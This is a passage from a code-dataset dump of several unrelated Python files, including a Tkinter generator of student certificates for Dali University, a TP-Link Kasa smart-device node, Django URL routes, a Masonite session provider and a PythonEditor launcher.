pp:\n\t\t\t\t\tprint(\"ERROR\")\n\t\t\t\telse:\n\t\t\t\t\tdiff = ch - pp\n\t\t\t\t\tfor i in sorted(money, reverse=True):\n\t\t\t\t\t\twhile diff // i > 0:\n\t\t\t\t\t\t\tdiff -= i\n\t\t\t\t\t\t\tresult.append(money[i])\n\t\t\t\t\tprint(','.join(result))\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Codeeval/Cash Register/P.py","file_name":"P.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"442769533","text":"from GameLogic.Figure import Figure\nclass Pawn(Figure):\n def turns(self,field,pos):\n i,j = pos\n turns =[]\n for k in range(1):\n if not i+k >7:\n if field[i+k][j]==0:\n turns.append((i,j))\n return turns","sub_path":"GameLogic/Pawn.py","file_name":"Pawn.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"344744117","text":"#-*- coding: utf-8 -*-\r\nimport os\r\nimport time\r\nimport datetime\r\nimport docx\r\nimport xlrd\r\nfrom docx import Document\r\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\r\nimport tkinter as tk\r\nfrom tkinter.messagebox import *\r\n\r\nclass Graduate:\r\n\tdef __init__(self,root):\r\n\t\tself.todolist=[]\r\n\t\tworkbook = xlrd.open_workbook('graduate.xlsx')\r\n\t\ttable = workbook.sheets()[0]\r\n\t\tnrows = table.nrows\r\n\t\tncols = table.ncols\r\n\t\tfor i in range(0,nrows):\r\n\t\t\trow_list=[]\r\n\t\t\trowValues= table.row_values(i) \r\n\t\t\tself.todolist.append(rowValues)\r\n\t\tself.todolist.remove(self.todolist[0])\r\n\t\t\r\n\t\tframe=tk.Frame(root)\r\n\t\tframe.pack()\r\n\t\ttk.Button(frame,text='No Criminal Certificate',command=self.loopNCC).pack(side=tk.LEFT)\r\n\t\ttk.Button(frame,text='Migration Certificate',command=self.loopMC).pack(side=tk.LEFT)\r\n\t\ttk.Button(frame,text='Study Certificate (Chinese)',command=self.loopSC_CN).pack(side=tk.LEFT)\r\n\t\ttk.Button(frame,text='Study Certificate (English)',command=self.loopSC_EN).pack(side=tk.LEFT)\r\n\t\tframe=tk.Frame(root)\r\n\t\tframe.pack()\r\n\r\n\t\ttk.Label(root,text='\\nPowered by@ShaoTech\\nCopyriht © 大理大学留学生教育服务中心 版权所有\\n如有问题请联系:石少华,Email: shi.sh@foxmail.com').pack(side=tk.BOTTOM)\r\n\t\tREADME_btn=tk.Button(frame,text='使用说明',command=self.ReadMe)\r\n\t\tREADME_btn.pack(side=tk.TOP)\r\n\r\n\tdef ReadMe(self):\r\n\t\t#os.system('README.txt')\r\n\t\tshowinfo('使用说明','\\n此程序所在文件夹中需有如下两个文件:\\n1. 命名为graduate.xlsx的Excel文件。此文件为待做学生信息文件,Excel第一行为表头,从左到右应依次为:\\n序号,学号,护照姓名,中文名,性别(格式为Male/Female),护照号,生日(英文),国籍(英文)\\n2. 命名为template_blank.docx的大理大学留学生教育服务中心模版文件。若无此文件,生成的文件中将无页眉页脚。\\n\\n使用方法:\\n1. 将待做学生信息写入graduate.xlsx\\n2. 直接双击运行graduate_tk.py')\r\n\t\t\r\n\tdef NCC(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('CERTIFICATE OF NO CRIMINAL RECORD')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n\t\tdate=doc.add_paragraph()\r\n\t\tdate.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\tnow = datetime.datetime.now()\r\n\t\ttoday=now.strftime(\"%B %d, %Y\")\r\n\t\tdate_txt='\\n%s\\n'%today\r\n\t\tdate_txt='\\nJune 25'\r\n\t\tdate.add_run(date_txt)\r\n\t\tdate.add_run('th').font.superscript = True\r\n\t\tdate.add_run(', 2019\\n')\r\n\t\t\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='Ms. '\r\n\t\t\tHeShe='her'\r\n\t\telse:\r\n\t\t\tSex='Mr. '\r\n\t\t\tHeShe='his'\r\n\t\tName=row[2]\r\n\t\tPPNo=row[5]\r\n\t\tGrade='20'+row[1][2:4]\r\n\t\tif row[1][0]=='Y' or row[1][0]=='y':\r\n\t\t\tGrade=row[1][1:5]\r\n\t\tbody_txt='''This is to certify that %s%s (passport No. %s; student No. %s) has no disciplinary records against the rules and regulations of Dali University and has no Chinese judicial office records of committing any offense against Chinese criminal laws during %s study in P.R. China from September %s to till now.\\n\\nCertified by\\n'''%(Sex,Name,PPNo,RollNo,HeShe,Grade)\r\n\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody_run=body.add_run(body_txt)\r\n\t\tbody.paragraph_format.line_spacing = docx.shared.Pt(30)\r\n\r\n\t\tinscription='\\n\\n\\n\\nMs. Zhou Lin\\nDeputy Director\\nEducation & Service Center for International Students\\nDali University\\nNo. 2 Hongsheng Road, Dali, Yunnan 671003, P. R. CHINA\\nEmail: leanne927cn@hotmail.com\\nTelephone: +86-872-221-8978 Fax:+86-872-221-8979'\t\r\n\t\tins=doc.add_paragraph()\r\n\t\tins.paragraph_format.line_spacing = docx.shared.Pt(25)\r\n\t\tins_run=ins.add_run(inscription)\r\n\t\tins_run.font.bold = True\r\n\r\n\t\ttoday_appen = datetime.date.today()\r\n\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tdoc.save('NCC_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\t\t\t\r\n\tdef MC(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('MIGRATION CERTIFICATE')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n\t\tdate=doc.add_paragraph()\r\n\t\tdate.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\tnow = datetime.datetime.now()\r\n\t\ttoday=now.strftime(\"%B %d, %Y\")\r\n\t\tdate_txt='\\n%s\\n'%today\r\n\t\tdate_txt='\\nJune 25'\r\n\t\tdate.add_run(date_txt)\r\n\t\tdate.add_run('th').font.superscript = True\r\n\t\tdate.add_run(', 2019\\n')\r\n\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='Ms. '\r\n\t\t\tHeShe='her'\r\n\t\telse:\r\n\t\t\tSex='Mr. '\r\n\t\t\tHeShe='his'\r\n\t\tName=row[2]\r\n\t\tPPNo=row[5]\r\n\t\tDOB=row[6]\r\n\t\tNation=row[7]\r\n\r\n\t\tbody_txt='''This university has no objection to the admission of %s%s, from %s, bearing Dali University’s registration No. %s, passport No. %s, born on %s, for %s further study in any institution or university in any country.\\n\\nWe wish %s success in life.\\n\\n\\n'''%(Sex,Name,Nation,RollNo,PPNo,DOB,HeShe,HeShe)\r\n\t\tinfoNeed=list([Sex,Name,Nation,RollNo,PPNo,DOB,HeShe,HeShe])\r\n\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\tprint ('有缺失信息,请补全后再试!')\r\n\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody_run=body.add_run(body_txt)\r\n\t\tparagraph_format = body.paragraph_format\r\n\t\tparagraph_format.line_spacing = docx.shared.Pt(30)\r\n\t\tinscription='\\n\\nMs. Zhou Lin\\nDeputy Director\\nEducation & Service Center for International Students\\nDali University\\nNo. 2 Hongsheng Road, Dali, Yunnan 671003, P. R. CHINA\\nEmail: leanne927cn@hotmail.com\\nTelephone: +86-872-221-8978 Fax:+86-872-221-8979'\r\n\t\tins_run=body.add_run(inscription)\r\n\t\tfont = ins_run.font\r\n\t\tfont.bold = True\r\n\r\n\t\ttoday_appen = datetime.date.today()\r\n\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tdoc.save('MC_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\r\n\tdef SC_CN(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('在 读 证 明\\n\\n')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\t\t\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='女'\r\n\t\telse:\r\n\t\t\tSex='男'\r\n\t\tName=row[2]\r\n\t\tName_CN=row[3]\r\n\t\tPPNo=row[5]\r\n\t\tNation=row[7]\r\n\t\tif 'India' in Nation:\r\n\t\t\tNation='印度'\r\n\t\telif 'Nepal' in Nation:\r\n\t\t\tNation='尼泊尔'\r\n\t\telif 'Pakistan' in Nation:\r\n\t\t\tNation='巴基斯坦'\r\n\t\telif 'Bangladesh' in Nation:\r\n\t\t\tNation='孟加拉国'\r\n\t\telif 'Ivory Cost' in Nation:\r\n\t\t\tNation='科特迪瓦'\r\n\t\telif 'Laos' in Nation:\r\n\t\t\tNation='老挝'\r\n\t\telif 'Cambodia' in Nation:\r\n\t\t\tNation='柬埔寨'\r\n\t\telif 'Tanzania' in Nation:\r\n\t\t\tNation='坦桑尼亚'\r\n\t\telif 'Viet' in Nation:\r\n\t\t\tNation='越南'\r\n\t\telif 'Somalia' in Nation:\r\n\t\t\tNation='索马里'\r\n\t\telif 'Burma' in Nation or 'Myanmar' in Nation:\r\n\t\t\tNation='缅甸'\r\n\t\telif 'Zambia' in Nation:\r\n\t\t\tNation='赞比亚'\r\n\t\telif 'Yemen' in Nation:\r\n\t\t\tNation='也门'\r\n\t\telif 'Mongolia' in Nation:\r\n\t\t\tNation='蒙古'\r\n\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody.paragraph_format.line_spacing = docx.shared.Pt(30)\r\n\t\t\r\n\t\tbody.add_run(' 兹证明')\r\n\t\tbody.add_run('%s'%Name).font.underline = True\r\n\r\n\t\tbody.add_run(',性别')\r\n\t\tbody.add_run('%s'%Sex).font.underline = True\r\n\t\t\r\n\t\tbody.add_run(',中文名')\r\n\t\tbody.add_run('%s'%Name_CN).font.underline = True\r\n\r\n\t\tbody.add_run(',国籍')\r\n\t\tbody.add_run('%s'%Nation).font.underline = True\r\n\r\n\t\tbody.add_run(',护照号码')\r\n\t\tbody.add_run('%s'%PPNo).font.underline = True\r\n\r\n\t\tbody.add_run(',为我校')\r\n\t\tbody.add_run('临床医学院2013级临床医学专业本科生').font.underline = True\r\n\t\tbody.add_run('。该生于2013年10月入学,2019年7月从我校毕业。\\n\\n\\t特此证明。\\n\\n')\r\n\r\n\t\tinfoNeed=list([Sex,Name,Name_CN,PPNo,Nation])\r\n\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\tprint ('有缺失信息,请补全后再试!')\r\n\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\r\n\t\tyear='年'\r\n\t\tmonth='月'\r\n\t\tday='日'\r\n\t\tcc=time.localtime(time.time())\r\n\t\tend_txt='大理大学留学生教育服务中心\\n%s'%str(cc.tm_year)+year+str(cc.tm_mon)+month+str(cc.tm_mday)+day\r\n\t\t#end_txt='大理大学留学生教育服务中心\\n2019年6月25日'\r\n\t\tend=doc.add_paragraph()\r\n\t\tend_run=end.add_run(end_txt)\r\n\t\tparagraph_format = end.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\ttoday_appen = datetime.date.today()\r\n\t\t\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tdoc.save('SC_CN_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\r\n\tdef SC_EN(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('STUDY CERTIFICATE')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n\t\tdate=doc.add_paragraph()\r\n\t\tdate.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\tnow = datetime.datetime.now()\r\n\t\ttoday=now.strftime(\"%B %d, %Y\")\r\n\t\tdate_txt='\\n%s\\n'%today\r\n\t\t#date_txt='\\nJune 25'\r\n\t\tdate.add_run(date_txt)\r\n\t\t#date.add_run('th').font.superscript = True\r\n\t\t#date.add_run(', 2019\\n')\r\n\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='Ms. '\r\n\t\t\tHeShe='her'\r\n\t\t\tHe='She'\r\n\t\telse:\r\n\t\t\tSex='Mr. '\r\n\t\t\tHeShe='his'\r\n\t\t\tHe='He'\r\n\t\tName=row[2]\r\n\t\tPPNo=row[5]\r\n\t\tDOB=row[6]\r\n\t\tNation=row[7]\r\n\t\tMajor='Clinical Medicine'\r\n\t\tSchool='Clinical Medicine College'\r\n\t\tGrade='20'+row[1][2:4]\r\n\t\tif row[1][0]=='Y' or row[1][0]=='y':\r\n\t\t\tGrade=row[1][1:5]\r\n\t\ttoyear=now.strftime(\"%Y\")\r\n\t\tyear_count=int(toyear)-int(Grade)\r\n\t\tif year_count ==0:\r\n\t\t\tyear_count='first'\r\n\t\telif year_count ==1:\r\n\t\t\tyear_count='first'\r\n\t\telif year_count ==2:\r\n\t\t\tyear_count='second'\r\n\t\telif year_count ==3:\r\n\t\t\tyear_count='third'\r\n\t\telif year_count ==4:\r\n\t\t\tyear_count='fourth'\r\n\t\telif year_count ==5:\r\n\t\t\tyear_count='fifth'\r\n\t\telif year_count ==6:\r\n\t\t\tyear_count='sixth'\r\n\t\telif year_count ==7:\r\n\t\t\tyear_count='seventh'\r\n\t\telif year_count ==8:\r\n\t\t\tyear_count='eighth'\r\n\r\n\t\tbody_txt='''TO WHOM IT MAY CONCERN:\\n\\nThis is to certify that %s%s (passport No. %s) majoring in %s is studying in %s of Dali University since September, %s. %s has been promoted to %s %s academic year studying in the year of %s.\\n\\nSincerely yours\\n'''%(Sex,Name,PPNo,Major,School,Grade,He,HeShe,year_count,toyear)\r\n\t\tinfoNeed=list([Sex,Name,PPNo,Major,School,Grade,He,HeShe,year_count,toyear])\r\n\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\tprint ('有缺失信息,请补全后再试!')\r\n\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody_run=body.add_run(body_txt)\r\n\t\tparagraph_format = body.paragraph_format\r\n\t\tparagraph_format.line_spacing = docx.shared.Pt(30)\r\n\t\tinscription='\\n\\nMs. Zhou Lin\\nDeputy Director\\nEducation & Service Center for International Students\\nDali University\\nNo. 2 Hongsheng Road, Dali, Yunnan 671003, P. R. CHINA\\nEmail: leanne927cn@hotmail.com\\nTelephone: +86-872-221-8978 Fax:+86-872-221-8979'\r\n\t\tins_run=body.add_run(inscription)\r\n\t\tfont = ins_run.font\r\n\t\tfont.bold = True\r\n\r\n\t\ttoday_appen = datetime.date.today()\r\n\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\telse:\r\n\t\t\tdoc.save('SC_EN_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\t\t\t\r\n\tdef loopNCC(self):#No Criminal Certificate\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[4],row[5]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.NCC(doc,row,newPage)\r\n\t\t\r\n\tdef loopMC(self):#Migration Certificate\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[4],row[5],row[6],row[7]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.MC(doc,row,newPage)\r\n\r\n\t\t\r\n\tdef loopSC_CN(self):#Study Certificate in Chinese language\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[3],row[4],row[5],row[7]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.SC_CN(doc,row,newPage)\r\n\r\n\t\t\r\n\tdef loopSC_EN(self):#Study Certificate in English language\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[4],row[5],row[6],row[7]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.SC_EN(doc,row,newPage)\r\n\t\t\r\nroot=tk.Tk()\r\nroot.title('学生各类证明生成器')\r\n#root.geometry('370x850')\r\n#root.minsize(200, 200)\r\n\r\nSelect=tk.Label(root,text='\\n请选择要生成的文件')\r\nSelect.pack()\r\n\r\napp=Graduate(root)\r\nroot.mainloop()\r\n","sub_path":"graduate_tk.py","file_name":"graduate_tk.py","file_ext":"py","file_size_in_byte":14145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"407789065","text":"from django.urls import include, path\n\nfrom .views import CRMListView, CRMCreateView\n\napp_name = 'crm'\nurlpatterns = [\n path('list/', include([\n path('create/', CRMCreateView.as_view(), name='create'),\n path('', CRMListView.as_view(), name='list'),\n # path('/', PostDetailView.as_view(), name='detail'),\n # path('/edit/', PostUpdateView.as_view(), name='edit'),\n # path('/delete/', PostDeleteView.as_view(), name='delete'),\n ])),\n]\n","sub_path":"WebApplication/crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"509884544","text":"#\n# TP Link Kasa Smart Device Node\n# All Devices are one of these to share the common methods\n#\n#\nimport re,asyncio\nimport polyinterface\nfrom kasa import SmartDeviceException\nfrom converters import bri2st,st2bri\n\nLOGGER = polyinterface.LOGGER\n\nclass SmartDeviceNode(polyinterface.Node):\n\n def __init__(self, controller, parent_address, address, name, dev, cfg):\n self.controller = controller\n self.name = name\n self.dev = dev\n self.cfg = cfg\n self.pfx = f\"{self.name}:\"\n LOGGER.debug(f'{self.pfx} dev={dev}')\n LOGGER.debug(f'{self.pfx} cfg={cfg}')\n self.ready = False\n self.host = cfg['host']\n self.debug_level = 0\n self.st = None\n self.event = None\n self.connected = None # So start will force setting proper status\n LOGGER.debug(f'{self.pfx} controller={controller} address={address} name={name} host={self.host}')\n if not self.dev is None and self.dev.has_emeter:\n self.drivers.append({'driver': 'CC', 'value': 0, 'uom': 1}) #amps\n self.drivers.append({'driver': 'CV', 'value': 0, 'uom': 72}) #volts\n self.drivers.append({'driver': 'CPW', 'value': 0, 'uom': 73}) #watts\n self.drivers.append({'driver': 'TPW', 'value': 0, 'uom': 33}) #kWH\n self.cfg['id'] = self.id\n super().__init__(controller, parent_address, address, name)\n\n def start(self):\n self.connect()\n self.ready = True\n\n def query(self):\n self.set_state()\n self.set_energy()\n self.reportDrivers()\n\n def shortPoll(self):\n if not self.ready:\n return\n # Keep trying to connect if possible\n self.connect()\n self.set_state()\n\n def longPoll(self):\n if not self.connected:\n LOGGER.info(f'{self.pfx} Not connected, will retry...')\n self.connect()\n if self.connected:\n self.set_energy()\n\n def connect(self):\n if not self.is_connected():\n LOGGER.debug(f'{self.pfx} connected={self.is_connected()}')\n try:\n self.dev = self.newdev()\n # We can get a dev, but not really connected, so make sure we are connected.\n self.update()\n sys_info = self.dev.sys_info\n self.set_connected(True)\n except SmartDeviceException as ex:\n LOGGER.error(f\"{self.pfx} Unable to connect to device '{self.name}' {self.host} will try again later: {ex}\")\n self.set_connected(False)\n except:\n LOGGER.error(f\"{self.pfx} Unknown excption connecting to device '{self.name}' {self.host} will try again later\", exc_info=True)\n self.set_connected(False)\n return self.is_connected\n\n def update(self):\n asyncio.run(self.dev.update())\n\n def set_on(self):\n asyncio.run(self.dev.turn_on())\n self.set_state()\n self.set_energy()\n\n def set_off(self):\n asyncio.run(self.dev.turn_off())\n self.set_state()\n self.set_energy()\n\n def update(self):\n if self.dev is None:\n if self.connected:\n LOGGER.debug(f\"{self.pfx} No device\")\n self.set_connected(False)\n return False\n try:\n asyncio.run(self.dev.update())\n return True\n except SmartDeviceException as ex:\n if self.connected:\n LOGGER.error(f'{self.pfx} failed: {ex}')\n except Exception as ex:\n if self.connected:\n LOGGER.error(f'{self.pfx} failed', exc_info=True)\n self.set_connected(False)\n return False\n\n def set_state(self):\n LOGGER.debug(f'start: dev={self.dev}')\n # This doesn't call set_energy, since that is only called on long_poll's\n # We don't use self.connected here because dev might be good, but device is unplugged\n # So then when it's plugged back in the same dev will still work\n if self.update():\n ocon = self.connected\n if self.dev.is_on is True:\n if self.dev.is_dimmable:\n self.brightness = st2bri(self.dev.brightness)\n self.setDriver('ST',self.dev.brightness)\n self.setDriver('GV5',int(st2bri(self.dev.brightness)))\n else:\n self.brightness = 100\n self.setDriver('ST',100)\n else:\n self.brightness = 0\n self.setDriver('ST',0)\n if self.dev.is_color:\n hsv = self.dev.hsv\n self.setDriver('GV3',hsv[0])\n self.setDriver('GV4',st2bri(hsv[1]))\n self.setDriver('GV5',st2bri(hsv[2]))\n if self.dev.is_variable_color_temp:\n self.setDriver('CLITEMP',self.dev.color_temp)\n\n # On restore, or initial startup, set all drivers.\n if not ocon and self.connected:\n try:\n self.set_all_drivers()\n except Exception as ex:\n LOGGER.error(f'{self.pfx} set_all_drivers failed: {ex}',exc_info=True)\n LOGGER.debug(f'end: dev={self.dev}')\n\n # Called by set_state when device is alive, does nothing by default\n def set_all_drivers(self):\n pass\n\n def set_energy(self):\n if not self.update():\n return\n if self.dev.has_emeter:\n try:\n energy = self.dev.emeter_realtime\n LOGGER.debug(f'{self.pfx} {energy}')\n if energy is not None:\n # rounding the values reduces driver updating traffic for\n # insignificant changes\n if 'current' in energy:\n self.setDriver('CC',round(energy['current'],3))\n if 'current_ma' in energy:\n self.setDriver('CC',round(energy['current_ma']/1000,3))\n\n if 'voltage' in energy:\n self.setDriver('CV',round(energy['voltage'],1))\n if 'voltage_mv' in energy:\n self.setDriver('CV',round(energy['voltage_mv']*1000,1))\n\n if 'power' in energy:\n self.setDriver('CPW',round(energy['power'],3))\n elif 'power_mw' in energy:\n val = energy['power_mw']\n LOGGER.debug(f\"{val}\")\n self.setDriver('CPW',round(energy['power_mw']/1000,3))\n\n if 'total' in energy:\n self.setDriver('TPW',round(energy['total'],3))\n if 'total_wh' in energy:\n self.setDriver('TPW',round(energy['total_wh'],3))\n\n except SmartDeviceException as ex:\n LOGGER.error(f'{self.pfx} failed: {ex}')\n except:\n LOGGER.error(f'{self.pfx} failed', exc_info=True)\n else:\n LOGGER.debug(f'{self.pfx} no energy')\n\n def set_connected(self,st):\n # Just return if setting to same status\n if st == self.connected:\n return\n LOGGER.debug(f\"{self.pfx} {st}\")\n self.connected = st\n self.setDriver('GV0',1 if st else 0)\n if st:\n # Make sure current cfg is saved\n LOGGER.debug(f\"{self.pfx} save_cfg {st}\")\n try:\n self.cfg['host'] = self.dev.host\n self.cfg['model'] = self.dev.model\n self.controller.save_cfg(self.cfg)\n except SmartDeviceException as ex:\n LOGGER.error(f'{self.pfx} failed: {ex}')\n except:\n LOGGER.error(f'{self.pfx} unknown failure', exc_info=True)\n\n def is_connected(self):\n return self.connected\n\n def cmd_set_on(self, command):\n self.set_on()\n\n def cmd_set_off(self, command):\n self.set_off()\n","sub_path":"nodes/SmartDeviceNode.py","file_name":"SmartDeviceNode.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352166267","text":"\"\"\" A RedirectionProvider Service Provider \"\"\"\n\nfrom config import session\nfrom masonite.drivers import SessionCookieDriver, SessionMemoryDriver\nfrom masonite.managers import SessionManager\nfrom masonite.provider import ServiceProvider\n\n\nclass SessionProvider(ServiceProvider):\n\n def register(self):\n self.app.bind('SessionConfig', session)\n self.app.bind('SessionMemoryDriver', SessionMemoryDriver)\n self.app.bind('SessionCookieDriver', SessionCookieDriver)\n self.app.bind('SessionManager', SessionManager(self.app))\n\n def boot(self, Environ, Request, ViewClass, SessionManager, SessionConfig):\n self.app.bind('Session', SessionManager.driver(SessionConfig.DRIVER))\n Session = self.app.make('Session')\n Request.session = Session\n\n ViewClass.share({\n 'session': Session.helper\n })\n","sub_path":"masonite/providers/SessionProvider.py","file_name":"SessionProvider.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537720841","text":"#!/net/homes/mlast/bin nuke-safe-python-tg\n\"\"\" Launch PythonEditor as a Standalone Application.\nThis file can also be executed from within an existing\nQt QApplication to launch PythonEditor in a separate window.\n\"\"\"\n# from __future__ import absolute_import\nimport sys\nimport os\nimport time\n\nsys.dont_write_bytecode = True\nstart = time.time()\n\nos.environ['PYTHONEDITOR_CAPTURE_STARTUP_STREAMS'] = '1'\n\n# with startup variables set,\n# we can now import the package in earnest.\nfrom PythonEditor.ui import ide\nfrom PythonEditor.ui.features import ui_palette\nfrom PythonEditor.ui.Qt import QtWidgets\nfrom PythonEditor.ui.Qt import QtGui\nfrom PythonEditor.ui.Qt import QtCore\n\n\ndef main():\n app = QtWidgets.QApplication.instance()\n if not app:\n app = QtWidgets.QApplication(sys.argv)\n\n for widget in app.allWidgets():\n if widget.objectName() == 'IDE':\n widget.close()\n\n PDF = 'PYTHONEDITOR_DEFAULT_FONT'\n fontbase = QtGui.QFontDatabase()\n current_folder = os.path.dirname(__file__)\n user_font_file = os.path.join(current_folder, 'scripts', 'fonts', 'DejaVu Sans Mono for Powerline.ttf')\n fontbase.addApplicationFont(user_font_file)\n\n os.environ[PDF] = 'DejaVu Sans Mono for Powerline'\n _ide = ide.IDE()\n _ide.setParent(app.activeWindow())\n _ide.setWindowFlags(QtCore.Qt.Window)\n _ide.setPalette(ui_palette.get_palette_style())\n\n # Plastique isn't available on Windows, so try multiple styles.\n styles = QtWidgets.QStyleFactory.keys()\n style_found = False\n for style_name in ['Plastique', 'Fusion']:\n if style_name in styles:\n print('Setting style to:', style_name)\n style_found = True\n break\n\n if style_found:\n style = QtWidgets.QStyleFactory.create(style_name)\n _ide.setStyle(style)\n\n print('PythonEditor import time: %.04f seconds' % (time.time() - start))\n #_ide.showMaximized()\n _ide.show()\n if app.applicationName() in ['python', 'mayapy', 